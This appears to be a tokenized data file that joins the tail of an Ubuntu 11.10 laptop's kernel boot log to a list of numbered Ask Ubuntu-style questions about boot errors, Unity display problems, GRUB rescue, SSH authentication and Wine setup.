[ 0.489381 ] block layer scsi generic ( bsg ) driver version 0.4 loaded ( major 253 ) [ 0.489413 ] io scheduler noop registered [ 0.489415 ] io scheduler deadline registered [ 0.489460 ] io scheduler cfq registered ( default ) [ 0.489583 ] pcieport 0000:00:1c.0 : setting latency timer to 64 [ 0.489633 ] pcieport 0000:00:1c.0 : irq 40 for msi/msi-x [ 0.489699 ] pcieport 0000:00:1c.1 : setting latency timer to 64 [ 0.489741 ] pcieport 0000:00:1c.1 : irq 41 for msi/msi-x [ 0.489800 ] pcieport 0000:00:1c.2 : setting latency timer to 64 [ 0.489841 ] pcieport 0000:00:1c.2 : irq 42 for msi/msi-x [ 0.489904 ] pcieport 0000:00:1c.3 : setting latency timer to 64 [ 0.489944 ] pcieport 0000:00:1c.3 : irq 43 for msi/msi-x [ 0.490006 ] pcieport 0000:00:1c.4 : setting latency timer to 64 [ 0.490047 ] pcieport 0000:00:1c.4 : irq 44 for msi/msi-x [ 0.490126 ] pci_hotplug : pci hot plug pci core version : 0.5 [ 0.490149 ] pciehp : pci express hot plug controller driver version : 0.4 [ 0.490196 ] intel_idle : mwait substates : 0x1110 [ 0.490198 ] intel_idle : does not run on family 6 model 15 [ 0.491240 ] acpi : deprecated procfs i/f for ac is loaded , please retry with config_acpi_procfs_power cleared [ 0.493473 ] acpi : ac adapter [ adp1 ] ( on-line ) [ 0.493590 ] input : lid switch as /devices/lnxsystm:00/device:00/pnp0c0d:00/input/input0 [ 0.496771 ] acpi : lid switch [ lid0 ] [ 0.496818 ] input : sleep button as /devices/lnxsystm:00/device:00/pnp0c0e:00/input/input1 [ 0.496823 ] acpi : sleep button [ slpb ] [ 0.496865 ] input : power button as /devices/lnxsystm:00/lnxpwrbn:00/input/input2 [ 0.496869 ] acpi : power button [ pwrf ] [ 0.496900 ] acpi : acpi_idle registered with cpuidle [ 0.498719 ] monitor-mwait will be used to enter c-1 state [ 0.498753 ] monitor-mwait will be used to enter c-2 state [ 0.498761 ] marking tsc unstable due to tsc halts in idle [ 0.517627 ] thermal lnxtherm:00 : registered as thermal_zone0 [ 0.517630 ] acpi : thermal zone [ tzs0 ] ( 67 c ) [ 0.524796 ] thermal lnxtherm:01 : registered as thermal_zone1 [ 0.524799 ] acpi : thermal zone [ tzs1 ] ( 67 c ) [ 0.524823 ] acpi : deprecated procfs i/f for battery is loaded , please retry with config_acpi_procfs_power cleared [ 0.524852 ] erst : table is not found ! [ 0.524948 ] serial : 8250/16550 driver , 32 ports , irq sharing enabled [ 0.680991 ] acpi : battery slot [ bat0 ] ( battery present ) [ 0.688567 ] linux agpgart interface v0.103 [ 0.688672 ] agpgart-intel 0000:00:00.0 : intel gm45 chipset [ 0.688865 ] agpgart-intel 0000:00:00.0 : detected gtt size : 2097152k total , 262144k mappable [ 0.689786 ] agpgart-intel 0000:00:00.0 : detected 65536k stolen memory [ 0.689912 ] agpgart-intel 0000:00:00.0 : agp aperture is 256m @ 0xd0000000 [ 0.691006 ] brd : module loaded [ 0.691510 ] loop : module loaded [ 0.691967 ] fixed mdio bus : probed [ 0.691990 ] ppp generic driver version 2.4.2 [ 0.692065 ] tun : universal tun/tap device driver , 1.6 [ 0.692067 ] tun : ( c ) 1999-2004 max krasnyansky < maxk @ qualcomm.com > [ 0.692146 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 0.692181 ] ehci_hcd 0000:00:1a.7 : pci int c - > gsi 20 ( level , low ) - > irq 20 [ 0.692206 ] ehci_hcd 0000:00:1a.7 : setting latency timer to 64 [ 0.692210 ] ehci_hcd 0000:00:1a.7 : ehci host controller [ 0.692255 ] ehci_hcd 0000:00:1a.7 : new usb bus registered , assigned bus number 1 [ 0.692289 ] ehci_hcd 0000:00:1a.7 : debug port 1 [ 0.696181 ] ehci_hcd 0000:00:1a.7 : cache line size of 64 is not supported [ 0.696202 ] ehci_hcd 0000:00:1a.7 : irq 20 , io mem 0xf8904800 [ 0.712014 ] ehci_hcd 0000:00:1a.7 : usb 2.0 started , ehci 1.00 [ 0.712131 ] hub 1-0:1.0 : usb hub found [ 0.712136 ] hub 1-0:1.0 : 6 ports detected [ 0.712230 ] ehci_hcd 0000:00:1d.7 : pci int a - > gsi 23 ( level , low ) - > irq 23 [ 0.712243 ] ehci_hcd 0000:00:1d.7 : setting latency timer to 64 [ 0.712247 ] ehci_hcd 0000:00:1d.7 : ehci host controller [ 0.712287 ] ehci_hcd 0000:00:1d.7 : new usb bus registered , assigned bus number 2 [ 0.712315 ] ehci_hcd 0000:00:1d.7 : debug port 1 [ 0.716201 ] ehci_hcd 0000:00:1d.7 : cache line size of 64 is not supported [ 0.716216 ] ehci_hcd 0000:00:1d.7 : irq 23 , io mem 0xf8904c00 [ 0.732014 ] ehci_hcd 0000:00:1d.7 : usb 2.0 started , ehci 1.00 [ 0.732130 ] hub 2-0:1.0 : usb hub found [ 0.732135 ] hub 2-0:1.0 : 6 ports detected [ 0.732209 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 0.732223 ] uhci_hcd : usb universal host controller interface driver [ 0.732254 ] uhci_hcd 0000:00:1a.0 : pci int a - > gsi 20 ( level , low ) - > irq 20 [ 0.732262 ] uhci_hcd 0000:00:1a.0 : setting latency timer to 64 [ 0.732265 ] uhci_hcd 0000:00:1a.0 : uhci host controller [ 0.732298 ] uhci_hcd 0000:00:1a.0 : new usb bus registered , assigned bus number 3 [ 0.732325 ] uhci_hcd 0000:00:1a.0 : irq 20 , io base 0x00001820 [ 0.732441 ] hub 3-0:1.0 : usb hub found [ 0.732445 ] hub 3-0:1.0 : 2 ports detected [ 0.732508 ] uhci_hcd 0000:00:1a.1 : pci int b - > gsi 20 ( level , low ) - > irq 20 [ 0.732514 ] uhci_hcd 0000:00:1a.1 : setting latency timer to 64 [ 0.732518 ] uhci_hcd 0000:00:1a.1 : uhci host controller [ 0.732553 ] uhci_hcd 0000:00:1a.1 : new usb bus registered , assigned bus number 4 [ 0.732577 ] uhci_hcd 0000:00:1a.1 : irq 20 , io base 0x00001840 [ 0.732696 ] hub 4-0:1.0 : usb hub found [ 0.732700 ] hub 4-0:1.0 : 2 ports detected [ 0.732762 ] uhci_hcd 0000:00:1a.2 : pci int c - > gsi 20 ( level , low ) - > irq 20 [ 0.732768 ] uhci_hcd 0000:00:1a.2 : setting latency timer to 64 [ 0.732772 ] uhci_hcd 0000:00:1a.2 : uhci host controller [ 0.732805 ] uhci_hcd 0000:00:1a.2 : new usb bus registered , assigned bus number 5 [ 0.732829 ] uhci_hcd 0000:00:1a.2 : irq 20 , io base 0x00001860 [ 0.732942 ] hub 5-0:1.0 : usb hub found [ 0.732946 ] hub 5-0:1.0 : 2 ports detected [ 0.733007 ] uhci_hcd 0000:00:1d.0 : pci int a - > gsi 23 ( level , low ) - > irq 23 [ 0.733014 ] uhci_hcd 0000:00:1d.0 : setting latency timer to 64 [ 0.733017 ] uhci_hcd 0000:00:1d.0 : uhci host controller [ 0.733057 ] uhci_hcd 0000:00:1d.0 : new usb bus registered , assigned bus number 6 [ 0.733082 ] uhci_hcd 0000:00:1d.0 : irq 23 , io base 0x00001880 [ 0.733202 ] hub 6-0:1.0 : usb hub found [ 0.733206 ] hub 6-0:1.0 : 2 ports detected [ 0.733265 ] uhci_hcd 0000:00:1d.1 : pci int b - > gsi 17 ( level , low ) - > irq 17 [ 0.733273 ] uhci_hcd 0000:00:1d.1 : setting latency timer to 64 [ 0.733276 ] uhci_hcd 0000:00:1d.1 : uhci host controller [ 0.733313 ] uhci_hcd 0000:00:1d.1 : new usb bus registered , assigned bus number 7 [ 0.733351 ] uhci_hcd 0000:00:1d.1 : irq 17 , io base 0x000018a0 [ 0.733466 ] hub 7-0:1.0 : usb hub found [ 0.733470 ] hub 7-0:1.0 : 2 ports detected [ 0.733532 ] uhci_hcd 0000:00:1d.2 : pci int c - > gsi 18 ( level , low ) - > irq 18 [ 0.733539 ] uhci_hcd 0000:00:1d.2 : setting latency timer to 64 [ 0.733542 ] uhci_hcd 0000:00:1d.2 : uhci host controller [ 0.733578 ] uhci_hcd 0000:00:1d.2 : new usb bus registered , assigned bus number 8 [ 0.733610 ] uhci_hcd 0000:00:1d.2 : irq 18 , io base 0x000018c0 [ 0.733730 ] hub 8-0:1.0 : usb hub found [ 0.733736 ] hub 8-0:1.0 : 2 ports detected [ 0.733843 ] i8042 : pnp : ps/2 controller [ pnp0303 : kbd0 , pnp0f13 : ps2m ] at 0x60,0x64 irq 1,12 [ 0.751594 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 0.751605 ] serio : i8042 aux port at 0x60,0x64 irq 12 [ 0.751732 ] mousedev : ps/2 mouse device common for all mice [ 0.752670 ] rtc_cmos 00:08 : rtc can wake from s4 [ 0.752770 ] rtc_cmos 00:08 : rtc core : registered rtc_cmos as rtc0 [ 0.752796 ] rtc0 : alarms up to one month , y3k , 242 bytes nvram , hpet irqs [ 0.752907 ] device-mapper : uevent : version 1.0.3 [ 0.752976 ] device-mapper : ioctl : 4.20.0-ioctl ( 2011-02-02 ) initialised : dm-devel @ redhat.com [ 0.753028 ] cpuidle : using governor ladder [ 0.753093 ] cpuidle : using governor menu [ 0.753096 ] efi variables facility v0.08 2004-may-17 [ 0.753361 ] tcp cubic registered [ 0.753482 ] net : registered protocol family 10 [ 0.753966 ] net : registered protocol family 17 [ 0.753992 ] registering the dns_resolver key type [ 0.754113 ] pm : hibernation image not present or could not be loaded . [ 0.754131 ] registered taskstats version 1 [ 0.771553 ] magic number : 15:152:507 [ 0.771667 ] rtc_cmos 00:08 : setting system clock to 2011-10-22 00:30:48 utc ( 1319243448 ) [ 0.772238 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 0.772240 ] edd information not available . [ 0.774165 ] freeing unused kernel memory : 984k freed [ 0.774504 ] write protecting the kernel read-only data : 10240k [ 0.774755 ] freeing unused kernel memory : 20k freed [ 0.775093 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input3 [ 0.779727 ] freeing unused kernel memory : 1400k freed [ 0.801946 ] udevd [ 84 ] : starting version 173 [ 0.880950 ] sky2 : driver version 1.28 [ 0.881046 ] sky2 0000:02:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 0.881096 ] sky2 0000:02:00.0 : setting latency timer to 64 [ 0.881197 ] sky2 0000:02:00.0 : yukon-2 extreme chip revision 2 [ 0.881871 ] sky2 0000:02:00.0 : irq 45 for msi/msi-x [ 0.896273 ] sky2 0000:02:00.0 : eth0 : addr 00:1d:72 : ec:76 : d5 [ 0.910630 ] ahci 0000:00:1f.2 : version 3.0 [ 0.910647 ] ahci 0000:00:1f.2 : pci int b - > gsi 19 ( level , low ) - > irq 19 [ 0.910710 ] ahci 0000:00:1f.2 : irq 46 for msi/msi-x [ 0.910775 ] ahci : sss flag set , parallel bus scan disabled [ 0.910812 ] ahci 0000:00:1f.2 : ahci 0001.0200 32 slots 4 ports 3 gbps 0x33 impl sata mode [ 0.910816 ] ahci 0000:00:1f.2 : flags : 64bit ncq sntf stag pm led clo pio slum part ccc ems sxs [ 0.910821 ] ahci 0000:00:1f.2 : setting latency timer to 64 [ 0.941773 ] scsi0 : ahci [ 0.941954 ] scsi1 : ahci [ 0.942038 ] scsi2 : ahci [ 0.942118 ] scsi3 : ahci [ 0.942196 ] scsi4 : ahci [ 0.942268 ] scsi5 : ahci [ 0.942332 ] ata1 : sata max udma/133 abar m2048 @ 0xf8904000 port 0xf8904100 irq 46 [ 0.942336 ] ata2 : sata max udma/133 abar m2048 @ 0xf8904000 port 0xf8904180 irq 46 [ 0.942339 ] ata3 : dummy [ 0.942340 ] ata4 : dummy [ 0.942344 ] ata5 : sata max udma/133 abar m2048 @ 0xf8904000 port 0xf8904300 irq 46 [ 0.942347 ] ata6 : sata max udma/133 abar m2048 @ 0xf8904000 port 0xf8904380 irq 46 [ 1.028061 ] usb 1-5 : new high speed usb device number 2 using ehci_hcd [ 1.181775 ] usbcore : registered new interface driver uas [ 1.260062 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 1.261126 ] ata1.00 : ata-8 : hitachi hts543225l9a300 , fbeoc40c , max udma/133 [ 1.261129 ] ata1.00 : 488397168 sectors , multi 16 : lba48 ncq ( depth 31/32 ) , aa [ 1.262360 ] ata1.00 : configured for udma/133 [ 1.262518 ] scsi 0:0:0:0 : direct-access ata hitachi hts54322 fbeo pq : 0 ansi : 5 [ 1.262716 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 [ 1.262762 ] sd 0:0:0:0 : [ sda ] 488397168 512-byte logical blocks : ( 250 gb/232 gib ) [ 1.262824 ] sd 0:0:0:0 : [ sda ] write protect is off [ 1.262827 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 1.262851 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 1.287277 ] sda : sda1 sda2 sda3 [ 1.287693 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 1.580059 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 1.581188 ] ata2.00 : atapi : hl-dt-stdvdram gt10n , 1.00 , max udma/100 [ 1.582663 ] ata2.00 : configured for udma/100 [ 1.584162 ] scsi 1:0:0:0 : cd-rom hl-dt-st dvdram gt10n 1.00 pq : 0 ansi : 5 [ 1.585821 ] sr0 : scsi3-mmc drive : 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray [ 1.585824 ] cdrom : uniform cd-rom driver revision : 3.20 [ 1.585953 ] sr 1:0:0:0 : attached scsi cd-rom sr0 [ 1.586038 ] sr 1:0:0:0 : attached scsi generic sg1 type 5 [ 1.632061 ] usb 6-1 : new low speed usb device number 2 using uhci_hcd [ 1.908056 ] ata5 : sata link down ( sstatus 0 scontrol 300 ) [ 2.228065 ] ata6 : sata link down ( sstatus 0 scontrol 300 ) [ 2.228955 ] initializing usb mass storage driver ... [ 2.229052 ] usbcore : registered new interface driver usb-storage [ 2.229054 ] usb mass storage support registered . [ 2.235827 ] scsi6 : usb-storage 1-5:1.0 [ 2.235987 ] usbcore : registered new interface driver ums-realtek [ 2.244451 ] input : b16_b_02 usb-ps/2 optical mouse as /devices/pci0000:00/0000:00:1d.0/usb6/6-1/6-1:1.0/input/input4 [ 2.244598 ] generic-usb 0003:046d : c025.0001 : input , hidraw0 : usb hid v1.10 mouse [ b16_b_02 usb-ps/2 optical mouse ] on usb-0000:00:1d.0-1/input0 [ 2.244620 ] usbcore : registered new interface driver usbhid [ 2.244622 ] usbhid : usb hid core driver [ 3.091083 ] ext4-fs ( loop0 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 3.238275 ] scsi 6:0:0:0 : direct-access generic- multi-card 1.00 pq : 0 ansi : 0 ccs [ 3.348261 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 [ 3.351897 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk [ 47.138012 ] udevd [ 334 ] : starting version 173 [ 47.177678 ] lp : driver loaded but no devices found [ 47.197084 ] wmi : mapper loaded [ 47.197526 ] acer_wmi : acer laptop acpi-wmi extras [ 47.210227 ] acer_wmi : brightness must be controlled by generic video driver [ 47.566578 ] disabling lock debugging due to kernel taint [ 47.584050 ] ndiswrapper version 1.56 loaded ( smp=yes , preempt=no ) [ 47.620666 ] type=1400 audit ( 1319239895.347:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=624 comm= '' apparmor_parser '' [ 47.620934 ] type=1400 audit ( 1319239895.347:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=624 comm= '' apparmor_parser '' [ 47.621108 ] type=1400 audit ( 1319239895.347:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=624 comm= '' apparmor_parser '' [ 47.633056 ] [ drm ] initialized drm 1.1.0 20060810 [ 47.722594 ] i915 0000:00:02.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 47.722602 ] i915 0000:00:02.0 : setting latency timer to 64 [ 47.807152 ] ndiswrapper ( check_nt_hdr:141 ) : kernel is 64-bit , but windows driver is not 64-bit ; bad magic : 010b [ 47.807159 ] ndiswrapper ( load_sys_files:206 ) : could n't prepare driver 'rt2860' [ 47.807930 ] ndiswrapper ( load_wrap_driver:108 ) : could n't load driver rt2860 ; check system log for messages from 'loadndisdriver' [ 47.856250 ] usbcore : registered new interface driver ndiswrapper [ 47.861772 ] i915 0000:00:02.0 : irq 47 for msi/msi-x [ 47.861781 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 47.861783 ] [ drm ] driver supports precise vblank timestamp query . [ 47.861842 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=io+mem : owns=io+mem [ 47.980620 ] fixme : max pwm is zero . [ 48.286153 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 48.287033 ] console : switching to colour frame buffer device 170x48 [ 48.287062 ] fb0 : inteldrmfb frame buffer device [ 48.287064 ] drm : registered panic notifier [ 48.333883 ] acpi device:02 : registered as cooling_device2 [ 48.334053 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:00/input/input5 [ 48.334128 ] acpi : video device [ gfx0 ] ( multi-head : yes rom : no post : no ) [ 48.334203 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 48.334644 ] hda intel 0000:00:1b.0 : power state changed by acpi to d0 [ 48.334652 ] hda intel 0000:00:1b.0 : power state changed by acpi to d0 [ 48.334673 ] hda intel 0000:00:1b.0 : pci int a - > gsi 21 ( level , low ) - > irq 21 [ 48.334737 ] hda intel 0000:00:1b.0 : irq 48 for msi/msi-x [ 48.334772 ] hda intel 0000:00:1b.0 : setting latency timer to 64 [ 48.356107 ] adding 261116k swap on /host/ubuntu/disks/swap.disk . priority : -1 extents:1 across:261116k [ 48.380946 ] hda_codec : alc268 : bios auto-probing . [ 48.390242 ] input : hda intel mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input6 [ 48.390365 ] input : hda intel headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 48.490870 ] ext4-fs ( loop0 ) : re-mounted . opts : errors=remount-ro , user_xattr [ 48.917990 ] ppdev : user-space parallel port driver [ 48.950729 ] type=1400 audit ( 1319239896.675:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=941 comm= '' apparmor_parser '' [ 48.951114 ] type=1400 audit ( 1319239896.675:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=941 comm= '' apparmor_parser '' [ 48.977706 ] synaptics touchpad , model : 1 , fw : 7.2 , id : 0x1c0b1 , caps : 0xd04733/0xa44000/0xa0000 [ 49.048871 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input8 [ 49.078713 ] sky2 0000:02:00.0 : eth0 : enabling interface [ 49.079462 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 50.762266 ] sky2 0000:02:00.0 : eth0 : link is up at 100 mbps , full duplex , flow control rx [ 50.762702 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 54.751478 ] type=1400 audit ( 1319239902.475:7 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm-guest-session-wrapper '' pid=1039 comm= '' apparmor_parser '' [ 54.755907 ] type=1400 audit ( 1319239902.479:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=1040 comm= '' apparmor_parser '' [ 54.756237 ] type=1400 audit ( 1319239902.483:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1040 comm= '' apparmor_parser '' [ 54.756417 ] type=1400 audit ( 1319239902.483:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=1040 comm= '' apparmor_parser '' [ 54.764825 ] type=1400 audit ( 1319239902.491:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/bin/evince '' pid=1041 comm= '' apparmor_parser '' [ 54.768365 ] type=1400 audit ( 1319239902.495:12 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/bin/evince-previewer '' pid=1041 comm= '' apparmor_parser '' [ 54.770601 ] type=1400 audit ( 1319239902.495:13 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/bin/evince-thumbnailer '' pid=1041 comm= '' apparmor_parser '' [ 54.770729 ] type=1400 audit ( 1319239902.495:14 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/share/gdm/guest-session/xsession '' pid=1038 comm= '' apparmor_parser '' [ 54.775181 ] type=1400 audit ( 1319239902.499:15 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=1043 comm= '' apparmor_parser '' [ 54.775533 ] type=1400 audit ( 1319239902.499:16 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/telepathy-* '' pid=1043 comm= '' apparmor_parser '' [ 54.936691 ] init : failsafe main process ( 891 ) killed by term signal [ 54.944583 ] init : apport pre-start process ( 1096 ) terminated with status 1 [ 55.000373 ] init : apport post-stop process ( 1160 ) terminated with status 1 [ 55.005291 ] init : gdm main process ( 1159 ) killed by term signal [ 59.782579 ] ext4-fs ( loop0 ) : re-mounted . opts : errors=remount-ro , user_xattr , commit=0 [ 60.992021 ] eth0 : no ipv6 routers present [ 61.936072 ] device eth0 entered promiscuous mode [ 62.053949 ] bluetooth : core ver 2.16 [ 62.054005 ] net : registered protocol family 31 [ 62.054007 ] bluetooth : hci device and connection manager initialized [ 62.054010 ] bluetooth : hci socket layer initialized [ 62.054012 ] bluetooth : l2cap socket layer initialized [ 62.054993 ] bluetooth : sco socket layer initialized [ 62.058750 ] bluetooth : rfcomm tty layer initialized [ 62.058758 ] bluetooth : rfcomm socket layer initialized [ 62.058760 ] bluetooth : rfcomm ver 1.11 [ 62.059428 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 62.059432 ] bluetooth : bnep filters : protocol multicast [ 62.460389 ] init : plymouth-stop pre-start process ( 1662 ) terminated with status 1 '
70467	filesystem remounted at login ?	if i open a terminal after booting xubuntu 11.10 and run the command dmesg i see this message at the bottom : ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , commit=0 do i need to worry about this message ? i do not understand why the filesystem needs to be remounted . the partition sda1 contain the whole system . if i uninstall the display manager this message disappear . if i change the display manager to gdm the message is show again , so it makes no difference what display manager is installed .
70469	32bit vs 64bit on desktop	my cpu is intelâž coreâ˘2 quad q8200 which , by intel page support 64bit . i went to the download section and saw that for desktop ubuntu recommends the 32 bit and not the 64 bit . why ? i know that there were problems with flash and java on older versions - but is there any reason i should not go on 64 bit version ? why does the 64 bit version called amd64 and not just 64bit , i always thought that the amd relates to amd the chip manufacturer and ca n't understand if it compatible to intel chips
70475	is there an ubuntu tablet edition ?	is there a tablet version of ubuntu ? will it run on the ipad or motion le1600 ?
70478	can i copy & serve a website locally on the network ?	i have a pc that shares internet connection to another device , which is configurated to access it 's manufacturers website and get any updates available . note that this internet sharing is made through my ethernet port and that the device is n't configurable to access any other website . are there any methods to get all the data that is passing through my ethernet port and then connect my pc to the device and reproduce exactly what the website sent to the device when i recorded it like making my pc the website ? an example : device x website device : get the website id site : 0000000xx0xx00xx0 device : get date and time site : 12:30.31-12-2011gmt-4 device : download updates if available site : pkg1.zip pkg2.iso pkg3.tar device x pc device : get the website id pc : 0000000xx0xx00xx0 device : get date and time pc : 12:30.31-12-2011gmt-4 device : download updates if available pc : pkg1.zip pkg2.iso pkg3.tar so just reproduce the same thing the website sent to the device , but it 'll be my pc that will be sending the data . thanks for the attention , rodrigo .
70479	how to install gtkmm ?	is the gtkmm package already installed by default ? if not how do i install it on ubuntu 11.10 with all the prerequisites ? i do not see any reference to the packages described in the gtkmm tutorial in the ubuntu software center . would a command line install be better ? do i need to add a repository ?
70482	`` unknown filesystem '' error and grub rescue prompt on boot	i installed ubuntu 11.10 alongside windows 7 . when i restarted my pc it showed unknown file system and grub > . i googled it and found something after which it is showing only grub > now i 'm using a live cd and trying to find any other solutions . all the files in partition where windows 7 and ubuntu 11.10 are installed , are present . also , i 'm posting the output of fdisk -l , i hope that will help . ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 224 heads , 19 sectors/track , 229504 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0bc187fb device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 102399999 51096576 7 hpfs/ntfs/exfat /dev/sda3 102400000 307199999 102400000 7 hpfs/ntfs/exfat /dev/sda4 307202046 976771071 334784513 f w95 ext 'd ( lba ) /dev/sda5 307202048 512002047 102400000 7 hpfs/ntfs/exfat /dev/sda6 664348672 675837951 5744640 82 linux swap / solaris /dev/sda7 675846144 839686143 81920000 7 hpfs/ntfs/exfat /dev/sda8 839688192 976771071 68541440 7 hpfs/ntfs/exfat /dev/sda9 512004096 660273151 74134528 83 linux /dev/sda10 660275200 664336383 2030592 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 4002 mb , 4002910208 bytes 32 heads , 63 sectors/track , 3878 cylinders , total 7818184 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x01443411 device boot start end blocks id system /dev/sdb1 * 63 7818047 3908992+ b w95 fat32 ubuntu @ ubuntu : ~ $ any help would be greatly appreciated .
70483	after upgrade to 11.10 , display for main account is messed up	i upgraded to 11.10 from 11.04 earlier this week , and ran in to some problems booting up into the gui . when i booted , i got a message saying there was an error with my display , but i was be able to get into the tty2 terminal . i did some research , and found that a lot of people actually ran into the problem ; i was finally able to boot into the gui by running `` sudo startx '' , but the icons and display configurations are messed up . i made a new account , and the display for the new account is how it should be , but the display in my original account is still not right . here are images of my original account , and of my new account : messed up display on original account how display should look on new account does anyone know why the display is different on my original account , but look perfectly fine when i made the new account ? i did n't change any of the display configurations on my original account .
70485	how do i install and run a few windows programs in ubuntu ( & derivatives ) with wine	ok i installed wine in mint & several other derivatives . i double click on a windows executable and i get a message about the dangers of running strange executables and a link to a wiki about the `` executable bit . '' i checked at wine hq , and these programs run well under linux .
70486	firestarter firewall will not start	after i installed firestarter on 11.10 and started it , it gave me some basic choices to configure the firewall . so i chose eth0 and no dhcp and then started the program . but it showed an error and said that the firewall could not be started . i searched for solutions and modified the 50-default.conf and restarted service rsyslog . then it showed that my eth0 was not ready . but my eth0 was working well ! what 's the matter ?
70488	ssh fails to auth by public key ( periodically )	after an upgrade of desktop and server ( both ) to ubuntu 11.10 , periodically the desktop is unable to perform publickey authentication with the server ( -v option reveals nothing of evidently use ) . using the same key from pre-11.10 and windows partitions is successful . `` any ideas what gives ? '' thanks .
70490	what log files can i examine if launcher / dash wont start ?	i do n't know if i have the terminology correct . fresh-installed 11.10 today . but the bar on the left of the screen that auto-hides , and the menubar at the top of the screen along with the notification area were there the first few times i rebooted , but are now all gone . all i have is the desktop , with the icons on my desktop , and the default background . i can not get to a terminal except for full-screen ctrl+alt+f1 . only way i got firefox to start is by right-mouse-click on the desktop and creating an empty test.html file . how can i debug what has gone wrong ? what log files should i be looking at ? the thing that should be on the left , that 's called launcher or dash , right ? where would i look to see why/how/where it is crashing ? may as well add some comments as i discover things : press ctrl+alt+f1 to get to the full-screen command-prompt run : export display=:0 run : unity & run : unity-2d-launcher & press ctrl+alt+f7 to get back to a semi-usable desktop the question still remains : why are these not starting up by themselves ...
70494	unity is not loading correctly	i have ubuntu 11.10 and it was working well . but right now when i try to start my session with unity it loads incorrectly . here is how it looks like : no sidebar , no toolbar . however , when i start a session selecting unity 2d it loads correctly . what is the problem ? note , that i am using sony vaio laptop with nvidia geforce of 1gb memory and all the controllers and drivers for nvidia geforce are installed correctly . thank you , bak update 1 when i try unity -- reset command it gives following warning message i/o warning : failed to load external entity `` /home/jhon/.compiz/session/102b9a8b904eafa80213192505537390400000017880001 '' . in reality there is no any folder called .compiz in my home directory , instead of that folder i have compiz-1 folder .
70497	use unity on console and unity 2d on freenx ?	i love freenx and i am having great difficulty trying to get it to work on an 11.10 server . when i try to connect , i immediately get disconnected . i have seen in posts that unity 3d causes issues with nx sessions . i can ssh to the machine . is there a way i can keep the standard 11.10 unity on the console , but force nxserver to use unity 2d ?
70504	mouse can still move but no clicks are registered and everything is locked up	every now and then everything appears to lock up and i ca n't really do anything . i can move my mouse and it will reflect that on the screen but i ca n't really do anything else . sitting long enough it is apparent the clock is n't updating . i can use ctl-alt-f1 but i do n't really know what to do to make anything responsive . i am using gnome-shell . i do n't know if anything similar would happen if i used unity instead . edit : by switching to a text terminal and putting the computer to sleep and bringing it up back i was able to get the gui terminal to be responsive . i 'm still interested in why this could be happening and an easier way to bring it to be responsive after it happens . edit the dos : it appears after working with 11.10 for a while that the only time that this occurs is when i 'm reading a pdf using evince . if i load evince from the terminal i get this always : ( evince:6963 ) : glib-gobject-warning ** : g_object_set_valist : construct property `` enable-gestures '' for object `evview ' ca n't be set after construction could this have something to do with the computer locking up ?
